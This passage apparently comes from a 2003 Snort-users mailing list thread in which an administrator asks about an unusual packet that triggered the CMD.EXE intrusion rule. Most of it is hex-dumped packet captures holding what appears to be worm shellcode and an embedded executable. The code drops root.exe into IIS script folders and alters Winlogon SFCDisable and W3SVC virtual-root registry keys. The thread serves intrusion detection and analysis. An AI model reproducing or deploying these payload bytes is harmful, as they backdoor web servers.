FC @..%|0@......... 0x01F0: FC FC FC FC FC FC FC FC FC FC 00 00 00 00 00 00 ................ 0x0200: 00 00 00 00 00 00 00 5C 45 58 50 4C 4F 52 45 52 .......\EXPLORER 0x0210: 2E 45 58 45 00 00 00 53 4F 46 54 57 41 52 45 5C .EXE...SOFTWARE\ 0x0220: 4D 69 63 72 6F 73 6F 66 74 5C 57 69 6E 64 6F 77 Microsoft\Window 0x0230: 73 20 4E 54 5C 43 s NT\C =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/11-16:01:54.390693 162.18.223.169:80 -> 61.180.83.4:4975 TCP TTL:64 TOS:0x0 ID:3427 IpLen:20 DgmLen:40 ***A**** Seq: 0x4216D51E Ack: 0x445C849F Win: 0x4000 TcpLen: 20 0x0000: 00 30 A3 10 C8 01 00 A0 8E 40 5F 50 08 00 45 00 .0.......@_P..E. 0x0010: 00 28 0D 63 00 00 40 06 5A F9 A2 12 DF A9 3D B4 .(.c..@.Z.....=. 0x0020: 53 04 00 50 13 6F 42 16 D5 1E 44 5C 84 9F 50 10 S..P.oB...D\..P. 0x0030: 40 00 69 70 00 00 00 00 00 00 00 00 @.ip........ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/11-16:01:54.561235 61.180.83.4:4975 -> 162.18.223.169:80 TCP TTL:105 TOS:0x0 ID:2906 IpLen:20 DgmLen:274 DF ***AP*** Seq: 0x445C869F Ack: 0x4216D51E Win: 0x4000 TcpLen: 20 0x0000: 00 A0 8E 40 5F 50 00 30 A3 10 C8 01 08 00 45 00 ...@_P.0......E. 0x0010: 01 12 0B 5A 40 00 69 06 F3 17 3D B4 53 04 A2 12 ...Z@.i...=.S... 0x0020: DF A9 13 6F 00 50 44 5C 86 9F 42 16 D5 1E 50 18 ...o.PD\..B...P. 0x0030: 40 00 EB 3A 00 00 FC FC FC FC FC FC FC FC FC FC @..:............ 0x0040: FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ 0x0050: FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ 0x0060: FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ 0x0070: FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ 0x0080: FC FC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0x0090: 00 00 00 00 00 00 00 5E BF B9 05 00 00 6A 07 E8 .......^.....j.. 0x00A0: 10 00 00 00 64 3A 5C 65 78 70 6C 6F 72 65 72 2E ....d:\explorer. 0x00B0: 65 78 65 00 8B 04 24 88 18 FF 55 CC 83 F8 FF 74 exe...$...U....t 0x00C0: 4D 89 85 4C FE FF FF AC 8A F8 38 3E 75 27 6A 20 M..L......8>u'j 0x00D0: E8 23 00 00 00 00 00 00 00 00 00 00 00 00 00 00 .#.............. 0x00E0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0x00F0: 00 00 00 00 00 6A 01 56 FF B5 4C FE FF FF FF 55 .....j.V..L....U 0x0100: C8 46 4F 75 C5 FF B5 4C FE FF FF FF 55 C4 FE C3 .FOu...L....U... 0x0110: 80 FB 64 0F 86 4C F9 FF FF C3 61 C9 C2 04 00 90 ..d..L....a..... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/11-16:01:54.561436 162.18.223.169:80 -> 61.180.83.4:4975 TCP TTL:64 TOS:0x0 ID:3431 IpLen:20 DgmLen:40 ***A**** Seq: 0x4216D51E Ack: 0x445C849F Win: 0x4000 TcpLen: 20 0x0000: 00 30 A3 10 C8 01 00 A0 8E 40 5F 50 08 00 45 00 .0.......@_P..E. 0x0010: 00 28 0D 67 00 00 40 06 5A F5 A2 12 DF A9 3D B4 .(.g..@.Z.....=. 0x0020: 53 04 00 50 13 6F 42 16 D5 1E 44 5C 84 9F 50 10 S..P.oB...D\..P. 0x0030: 40 00 69 70 00 00 00 00 00 00 00 00 @.ip........ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/11-16:01:54.578156 61.180.83.4:4975 -> 162.18.223.169:80 TCP TTL:105 TOS:0x0 ID:2905 IpLen:20 DgmLen:552 DF ***A**** Seq: 0x445C849F Ack: 0x4216D51E Win: 0x4000 TcpLen: 20 0x0000: 00 A0 8E 40 5F 50 00 30 A3 10 C8 01 08 00 45 00 ...@_P.0......E. 0x0010: 02 28 0B 59 40 00 69 06 F2 02 3D B4 53 04 A2 12 .(.Y@.i...=.S... 0x0020: DF A9 13 6F 00 50 44 5C 84 9F 42 16 D5 1E 50 10 ...o.PD\..B...P. 0x0030: 40 00 9E AF 00 00 75 72 72 65 6E 74 56 65 72 73 @.....urrentVers 0x0040: 69 6F 6E 5C 57 69 6E 6C 6F 67 6F 6E 00 00 00 53 ion\Winlogon...S 0x0050: 46 43 44 69 73 61 62 6C 65 00 00 9D FF FF FF 53 FCDisable......S 0x0060: 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E YSTEM\CurrentCon 0x0070: 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 trolSet\Services 0x0080: 5C 57 33 53 56 43 5C 50 61 72 61 6D 65 74 65 72 \W3SVC\Parameter 0x0090: 73 5C 56 69 72 74 75 61 6C 20 52 6F 6F 74 73 00 s\Virtual Roots. 0x00A0: 00 00 00 2F 53 63 72 69 70 74 73 00 00 00 00 2F .../Scripts..../ 0x00B0: 4D 53 41 44 43 00 00 2F 43 00 00 2F 44 00 00 63 MSADC../C../D..c 0x00C0: 3A 5C 2C 2C 32 31 37 00 00 00 00 64 3A 5C 2C 2C :\,,217....d:\,, 0x00D0: 32 31 37 FC FC FC FC FC FC FC FC FC FC FC FC FC 217............. 0x00E0: FC FC FC FC FC FC FC FC FC FC FC FC 00 00 00 00 ................ 0x00F0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0x0100: 3C 30 00 00 00 00 00 00 00 00 00 00 84 30 00 00 <0...........0.. 0x0110: 60 30 00 00 4C 30 00 00 00 00 00 00 00 00 00 00 `0..L0.......... 0x0120: 91 30 00 00 70 30 00 00 00 00 00 00 00 00 00 00 .0..p0.......... 0x0130: 00 00 00 00 00 00 00 00 00 00 00 00 9E 30 00 00 .............0.. 0x0140: A6 30 00 00 BE 30 00 00 00 00 00 00 C8 30 00 00 .0...0.......0.. 0x0150: DC 30 00 00 EE 30 00 00 FE 30 00 00 00 00 00 00 .0...0...0...... 0x0160: 9E 30 00 00 A6 30 00 00 BE 30 00 00 00 00 00 00 .0...0...0...... 0x0170: C8 30 00 00 DC 30 00 00 EE 30 00 00 FE 30 00 00 .0...0...0...0.. 0x0180: 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C ....KERNEL32.dll 0x0190: 00 41 44 56 41 50 49 33 32 2E 64 6C 6C 00 00 00 .ADVAPI32.dll... 0x01A0: 53 6C 65 65 70 00 00 00 47 65 74 57 69 6E 64 6F Sleep...GetWindo 0x01B0: 77 73 44 69 72 65 63 74 6F 72 79 41 00 00 00 00 wsDirectoryA.... 0x01C0: 57 69 6E 45 78 65 63 00 00 00 52 65 67 51 75 65 WinExec...RegQue 0x01D0: 72 79 56 61 6C 75 65 45 78 41 00 00 00 00 52 65 ryValueExA....Re 0x01E0: 67 53 65 74 56 61 6C 75 65 45 78 41 00 00 00 00 gSetValueExA.... 0x01F0: 52 65 67 4F 70 65 6E 4B 65 79 45 78 41 00 00 00 RegOpenKeyExA... 0x0200: 52 65 67 43 6C 6F 73 65 4B 65 79 FC FC FC FC FC RegCloseKey..... 0x0210: FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ 0x0220: FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ 0x0230: FC FC FC FC FC FC ...... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/11-16:01:54.578364 162.18.223.169:80 -> 61.180.83.4:4975 TCP TTL:64 TOS:0x0 ID:3432 IpLen:20 DgmLen:40 ***A**** Seq: 0x4216D51E Ack: 0x445C8789 Win: 0x3D16 TcpLen: 20 0x0000: 00 30 A3 10 C8 01 00 A0 8E 40 5F 50 08 00 45 00 .0.......@_P..E. 0x0010: 00 28 0D 68 00 00 40 06 5A F4 A2 12 DF A9 3D B4 .(.h..@.Z.....=. 0x0020: 53 04 00 50 13 6F 42 16 D5 1E 44 5C 87 89 50 10 S..P.oB...D\..P. 0x0030: 3D 16 69 70 00 00 00 00 00 00 00 00 =.ip........ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/11-16:01:54.578732 162.18.223.169:80 -> 61.180.83.4:4975 TCP TTL:64 TOS:0x0 ID:3433 IpLen:20 DgmLen:254 ***AP*** Seq: 0x4216D51E Ack: 0x445C8789 Win: 0x4000 TcpLen: 20 0x0000: 00 30 A3 10 C8 01 00 A0 8E 40 5F 50 08 00 45 00 .0.......@_P..E. 0x0010: 00 FE 0D 69 00 00 40 06 5A 1D A2 12 DF A9 3D B4 ...i..@.Z.....=. 0x0020: 53 04 00 50 13 6F 42 16 D5 1E 44 5C 87 89 50 18 S..P.oB...D\..P. 0x0030: 40 00 8A FE 00 00 48 54 54 50 2F 31 2E 30 20 33 @.....HTTP/1.0 3 0x0040: 30 32 20 4E 6F 74 20 41 6C 6C 6F 77 65 64 0D 0A 02 Not Allowed.. 0x0050: 4C 6F 63 61 74 69 6F 6E 3A 20 68 74 74 70 3A 2F Location: http:/ 0x0060: 2F 77 6D 73 74 2D 77 63 2E 62 61 6C 6C 2E 63 6F /wmst-wc.ball.co 0x0070: 6D 2F 61 63 63 65 73 73 2E 68 74 6D 6C 0D 0A 43 m/access.html..C 0x0080: 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 65 78 ontent-Type: tex 0x0090: 74 2F 68 74 6D 6C 0D 0A 43 6F 6E 74 65 6E 74 2D t/html..Content- 0x00A0: 4C 65 6E 67 74 68 3A 20 39 34 0D 0A 0D 0A 59 6F Length: 94....Yo 0x00B0: 75 72 20 72 65 71 75 65 73 74 20 69 73 20 62 65 ur request is be 0x00C0: 69 6E 67 20 72 65 64 69 72 65 63 74 65 64 20 74 ing redirected t 0x00D0: 6F 20 3A 3C 61 20 68 72 65 66 3D 22 68 74 74 70 o :<a href="http 0x00E0: 3A 2F 2F 77 6D 73 74 2D 77 63 2E 62 61 6C 6C 2E ://wmst-wc.ball. 0x00F0: 63 6F 6D 2F 61 63 63 65 73 73 2E 68 74 6D 6C 22 com/access.html" 0x0100: 3E 68 65 72 65 3C 2F 61 3E 2E 0D 0A >here</a>... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/11-16:01:54.578800 162.18.223.169:80 -> 61.180.83.4:4975 TCP TTL:64 TOS:0x0 ID:3434 IpLen:20 DgmLen:40 ***A***F Seq: 0x4216D5F4 Ack: 0x445C8789 Win: 0x4000 TcpLen: 20 0x0000: 00 30 A3 10 C8 01 00 A0 8E 40 5F 50 08 00 45 00 .0.......@_P..E. 0x0010: 00 28 0D 6A 00 00 40 06 5A F2 A2 12 DF A9 3D B4 .(.j..@.Z.....=. 0x0020: 53 04 00 50 13 6F 42 16 D5 F4 44 5C 87 89 50 11 S..P.oB...D\..P. 0x0030: 40 00 65 AF 00 00 00 00 00 00 00 00 @.e......... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/11-16:01:55.040386 61.180.83.4:4975 -> 162.18.223.169:80 TCP TTL:105 TOS:0x0 ID:2952 IpLen:20 DgmLen:40 DF ***A**** Seq: 0x445C8789 Ack: 0x4216D5F5 Win: 0x3F2A TcpLen: 20 0x0000: 00 A0 8E 40 5F 50 00 30 A3 10 C8 01 08 00 45 00 ...@_P.0......E. 0x0010: 00 28 0B 88 40 00 69 06 F3 D3 3D B4 53 04 A2 12 .(..@.i...=.S... 0x0020: DF A9 13 6F 00 50 44 5C 87 89 42 16 D5 F5 50 10 ...o.PD\..B...P. 0x0030: 3F 2A 66 85 00 00 00 00 00 00 00 00 ?*f......... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/11-16:01:55.047105 61.180.83.4:4975 -> 162.18.223.169:80 TCP TTL:105 TOS:0x0 ID:2953 IpLen:20 DgmLen:40 DF *****R** Seq: 0x445C8789 Ack: 0x4216D5F5 Win: 0x0 TcpLen: 20 0x0000: 00 A0 8E 40 5F 50 00 30 A3 10 C8 01 08 00 45 00 ...@_P.0......E. 0x0010: 00 28 0B 89 40 00 69 06 F3 D2 3D B4 53 04 A2 12 .(..@.i...=.S... 0x0020: DF A9 13 6F 00 50 44 5C 87 89 42 16 D5 F5 50 04 ...o.PD\..B...P. 0x0030: 00 00 A5 BB 00 00 00 00 00 00 00 00 ............ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/11-16:01:55.056770 61.180.83.4:4975 -> 162.18.223.169:80 TCP TTL:105 TOS:0x0 ID:2951 IpLen:20 DgmLen:40 DF ***A**** Seq: 0x445C8789 Ack: 0x4216D51E Win: 0x4000 TcpLen: 20 0x0000: 00 A0 8E 40 5F 50 00 30 A3 10 C8 01 08 00 45 00 ...@_P.0......E. 0x0010: 00 28 0B 87 40 00 69 06 F3 D4 3D B4 53 04 A2 12 .(..@.i...=.S... 0x0020: DF A9 13 6F 00 50 44 5C 87 89 42 16 D5 1E 50 10 ...o.PD\..B...P. 0x0030: 40 00 66 86 00 00 00 00 00 00 00 00 @.f......... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/11-16:01:55.057006 162.18.223.169:80 -> 61.180.83.4:4975 TCP TTL:64 TOS:0x0 ID:3451 IpLen:20 DgmLen:40 *****R** Seq: 0x4216D51E Ack: 0x0 Win: 0x4000 TcpLen: 20 0x0000: 00 30 A3 10 C8 01 00 A0 8E 40 5F 50 08 00 45 00 .0.......@_P..E. 0x0010: 00 28 0D 7B 00 00 40 06 5A E1 A2 12 DF A9 3D B4 .(.{..@.Z.....=. 0x0020: 53 04 00 50 13 6F 42 16 D5 1E 00 00 00 00 50 04 S..P.oB.......P. 0x0030: 40 00 32 78 00 00 00 00 00 00 00 00 @.2x........ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ On Tue, Mar 11, 2003 at 10:58:50AM -0500, John Hally wrote:
Hello, This is a different looking trace that tripped on the CMD.EXE rule. I usually see a bunch of ../../../cmd.exe, but this one looks different. Anyone else seeing this? it originated from 219.240.31.44, over in Korea: 000 : 61 6D 65 00 FF 75 BC FF 55 F8 89 45 98 E8 10 00 ame..u..U..E.... 010 : 00 00 57 53 41 47 65 74 4C 61 73 74 45 72 72 6F ..WSAGetLastErro 020 : 72 00 FF 75 BC FF 55 F8 89 45 94 E8 0B 00 00 00 r..u..U..E...... 030 : 55 53 45 52 33 32 2E 44 4C 4C 00 FF 55 F4 89 45 USER32.DLL..U..E 040 : 90 E8 0E 00 00 00 45 78 69 74 57 69 6E 64 6F 77 ......ExitWindow 050 : 73 45 78 00 FF 75 90 FF 55 F8 89 45 8C C3 8B 45 sEx..u..U..E...E 060 : 84 69 C0 05 84 08 08 40 89 45 84 8D 84 04 78 56 .i..... () E xV 070 : 34 12 F7 D8 C1 C0 08 C3 E8 E1 FF FF FF 3C 00 74 4............<.t 080 : F7 3C FF 74 F3 C3 E8 ED FF FF FF 8A F8 E8 E6 FF .<.t............ 090 : FF FF 8A D8 C1 E3 10 E8 DC FF FF FF 8A F8 E8 D5 ................ 0a0 : FF FF FF 8A D8 E8 B4 FF FF FF 83 E0 07 E8 20 00 .............. . 0b0 : 00 00 FF FF FF FF 00 FF FF FF 00 FF FF FF 00 FF ................ 0c0 : FF FF 00 FF FF FF 00 00 FF FF 00 00 FF FF 00 00 ................ 0d0 : FF FF 59 8B 04 81 23 D8 F7 D0 23 85 58 FE FF FF ..Y...#...#.X... 0e0 : 0B D8 80 FB 7F 74 9F 80 FB E0 74 9A 3B 9D 58 FE ....t....t.;.X. 0f0 : FF FF 74 92 C3 68 04 01 00 00 8D 85 5C FE FF FF ..t..h......\... 100 : 50 FF 55 E0 8D BC 05 5C FE FF FF E8 09 00 00 00 P.U....\........ 110 : 5C 43 4D 44 2E 45 58 45 00 5E FC A5 A5 A4 B3 63 \CMD.EXE.^.....c 120 : 6A 01 E8 1C 00 00 00 64 3A 5C 69 6E 65 74 70 75 j......d:\inetpu 130 : 62 5C 73 63 72 69 70 74 73 5C 72 6F 6F 74 2E 65 b\scripts\root.e 140 : 78 65 00 8B 0C 24 88 19 8D 85 5C FE FF FF 50 FF xe...$....\...P. 150 : 55 DC 6A 01 E8 2B 00 00 00 64 3A 5C 70 72 6F 67 U.j..+...d:\prog 160 : 72 61 7E 31 5C 63 6F 6D 6D 6F 6E 7E 31 5C 73 79 ra~1\common~1\sy 170 : 73 74 65 6D 5C 4D 53 41 44 43 5C 72 6F 6F 74 2E stem\MSADC\root. 180 : 65 78 65 00 8B 0C 24 88 19 8D 85 5C FE FF FF 50 exe...$....\...P 190 : FF 55 DC E8 BA 05 00 00 FC 4D 5A 50 00 02 00 00 .U.......MZP.... 1a0 : 00 04 00 0F 00 FF FF 00 00 B8 00 00 00 00 00 00 ................ 1b0 : 00 40 00 1A FC 00 00 01 FC FC FC FC FC FC 00 00 .@.............. 1c0 : 50 45 00 00 4C 01 03 00 FD 2A 25 29 00 00 00 00 PE..L....*%).... 1d0 : 00 00 00 00 E0 00 8F 81 0B 01 02 19 00 04 00 00 ................ 1e0 : 00 08 00 00 00 00 00 00 00 10 00 00 00 10 00 00 ................ 1f0 : 00 20 00 00 00 00 40 00 00 10 00 00 00 04 00 00 . ....@......... 200 : 01 00 00 00 00 00 00 00 03 00 0A 00 00 00 00 00 ................ 210 : 00 40 00 00 00 04 00 00 00 00 00 00 02 00 00 00 .@.............. 220 : 00 00 10 00 00 20 00 00 00 00 10 00 00 10 00 00 ..... .......... 230 : 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ................ 240 : 00 30 00 00 0C 01 FC FC FC 00 00 00 00 00 00 00 .0.............. 250 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 260 : 00 00 00 00 10 00 00 00 10 00 00 00 04 00 00 00 ................ 270 : 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ............... 280 : 00 00 60 00 00 00 00 00 00 00 00 00 10 00 00 00 ..`............. 290 : 20 00 00 00 04 00 00 00 0C 00 00 00 00 00 00 00 ............... 2a0 : 00 00 00 00 00 00 00 40 00 00 C0 00 00 00 00 00 .......@........ 2b0 : 00 00 00 00 10 00 00 00 30 00 00 00 04 00 00 00 ........0....... 2c0 : 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 ...............@ 2d0 : 00 00 C0 FC FC FC FC FC FC FC FC FC FC FC FC FC ................ 2e0 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ 2f0 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC 00 ................ 300 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 ...............h 310 : 04 01 00 00 68 D0 20 40 00 E8 61 01 00 00 8D B8 ....h. @..a..... 320 : D0 20 40 00 BE 00 20 40 00 A5 A5 A5 A5 6A 01 68 . @... @.....j.h 330 : D0 20 40 00 E8 4C 01 00 00 E8 0C 00 00 00 68 C0 . @..L........h. 340 : 27 09 00 E8 31 01 00 00 EB EF 68 D8 24 40 00 68 '...1.....h.$@.h 350 : 3F 00 0F 00 6A 00 68 10 20 40 00 68 02 00 00 80 ?...j.h. @.h.... 360 : E8 32 01 00 00 0B C0 75 26 6A 04 68 54 20 40 00 .2.....u&j.hT @. 370 : 6A 04 6A 00 68 48 20 40 00 FF 35 D8 24 40 00 E8 j.j.hH @..5.$@.. 380 : 0D 01 00 00 FF 35 D8 24 40 00 E8 0E 01 00 00 68 .....5.$@......h 390 : D8 24 40 00 68 3F 00 0F 00 6A 00 68 58 20 40 00 .$@.h?...j.hX @. 3a0 : 68 02 00 00 80 E8 ED 00 00 00 0B C0 75 55 BD 9C h...........uU.. 3b0 : 20 40 00 E8 4C 00 00 00 BD A8 20 40 00 E8 42 00 @..L..... @..B. 3c0 : 00 00 6A 09 68 B8 20 40 00 6A 01 6A 00 68 B0 20 ..j.h. @.j.j.h. 3d0 : 40 00 FF 35 D8 24 40 00 E8 B4 00 00 00 6A 09 68 @..5.$@......j.h 3e0 : C4 20 40 00 6A 01 6A 00 68 B4 20 40 00 FF 35 D8 . @.j.j.h. @..5. 3f0 : 24 40 00 E8 99 00 00 00 FF 35 D8 24 40 00 E8 9A $@.......5.$@... 400 : 00 00 00 C3 C7 05 D0 24 40 00 00 04 00 00 68 D0 .......$@.....h. 410 : 24 40 00 68 D0 20 40 00 68 D4 24 40 00 6A 00 55 $@.h. @.h.$@.j.U 420 : FF 35 D8 24 40 00 E8 60 00 00 00 0B C0 75 49 A1 .5.$@..`.....uI. 430 : D0 24 40 00 0B C0 74 40 BE D0 20 40 00 80 3E 00 .$@...t@.. @..>. 440 : 74 36 46 66 81 7E FE 2C 2C 75 F2 C7 06 32 31 37 t6Ff.~.,,u...217 450 : 00 81 EE CC 20 40 00 89 35 D0 24 40 00 FF 35 D0 .... @..5.$@..5. 460 : 24 40 00 68 D0 20 40 00 6A 01 6A 00 55 FF 35 D8 $@.h. @.j.j.U.5. 470 : 24 40 00 E8 19 00 00 00 C3 FF 25 60 30 40 00 FF $@........%`0@.. 480 : 25 64 30 40 00 FF 25 68 30 40 00 FF 25 70 30 40 %d0@..%h0@..%p0@ 490 : 00 FF 25 74 30 40 00 FF 25 78 30 40 00 FF 25 7C ..%t0@..%x0@..%| 4a0 : 30 40 FC FC FC FC FC FC FC FC FC FC FC FC FC FC 0@.............. 4b0 : FC FC FC FC FC 00 00 00 00 00 00 00 00 00 00 00 ................ 4c0 : 00 00 5C 45 58 50 4C 4F 52 45 52 2E 45 58 45 00 ..\EXPLORER.EXE. 4d0 : 00 00 53 4F 46 54 57 41 52 45 5C 4D 69 63 72 6F ..SOFTWARE\Micro 4e0 : 73 6F 66 74 5C 57 69 6E 64 6F 77 73 20 4E 54 5C soft\Windows NT\ 4f0 : 43 75 72 72 65 6E 74 56 65 72 73 69 6F 6E 5C 57 CurrentVersion\W 500 : 69 6E 6C 6F 67 6F 6E 00 00 00 53 46 43 44 69 73 inlogon...SFCDis 510 : 61 62 6C 65 00 00 9D FF FF FF 53 59 53 54 45 4D able......SYSTEM 520 : 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 \CurrentControlS 530 : 65 74 5C 53 65 72 76 69 63 65 73 5C 57 33 53 56 et\Services\W3SV 540 : 43 5C 50 61 72 61 6D 65 74 65 72 73 5C 56 69 72 C\Parameters\Vir 550 : 74 75 61 6C 20 52 6F 6F tual Roo ------------------------------------------------------- This SF.net email is sponsored by:Crypto Challenge is now open! Get cracking and register here for some mind boggling fun and the chance of winning an Apple iPod: http://ads.sourceforge.net/cgi-bin/redirect.pl?thaw0031en _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?listort-users
------------------------------------------------------- This SF.net email is sponsored by:Crypto Challenge is now open! Get cracking and register here for some mind boggling fun and the chance of winning an Apple iPod: http://ads.sourceforge.net/cgi-bin/redirect.pl?thaw0031en _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users
Current thread:
- different CMD.exe access?!? John Hally (Mar 11)
- Re: different CMD.exe access?!? Bamm Visscher (Mar 11)
- Re: different CMD.exe access?!? Jason (Mar 14)
- Re: different CMD.exe access?!? Phil Wood (Mar 11)
- Re: different CMD.exe access?!? Paul Schmehl (Mar 11)
- <Possible follow-ups>
- RE: different CMD.exe access?!? L. Christopher Luther (Mar 11)
- RE: different CMD.exe access?!? Ricardo, Gerson (Mar 14)
- Re: different CMD.exe access?!? Bamm Visscher (Mar 11)